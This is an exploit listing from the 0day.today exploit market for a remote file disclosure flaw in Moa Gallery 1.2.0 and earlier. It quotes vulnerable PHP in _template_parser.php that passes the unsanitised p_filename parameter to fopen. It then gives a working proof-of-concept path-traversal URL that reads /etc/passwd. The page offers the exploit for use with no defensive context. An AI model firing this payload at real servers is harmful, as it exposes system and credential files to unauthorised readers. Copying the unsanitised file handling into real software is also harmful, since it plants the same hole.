[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Moa Gallery <= 1.2.0 (p_filename) Remote File Disclosure Vulnerability

Author
GoLd_M
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-5698
Category
web applications
Date add
25-08-2009
Platform
unsorted
======================================================================
Moa Gallery <= 1.2.0 (p_filename) Remote File Disclosure Vulnerability
======================================================================


Moa Gallery <= 1.2.0 Remote File Disclosure Vulnerability
Code In sources\_template_parser.php


    $filename = $MOA_PATH."templates/".$template_name."/".$p_filename;

    $fp = @fopen($filename, "r");
    if ((!$fp) && (is_bool($fp)))
    {
      $fp = $fp = @fopen($MOA_PATH."templates/MoaDefault/".$p_filename, "r");

POC
/sources/_template_parser.php?p_filename=../../../../../../../../../../../../../../../etc/passwd




#  0day.today [2024-12-26]  #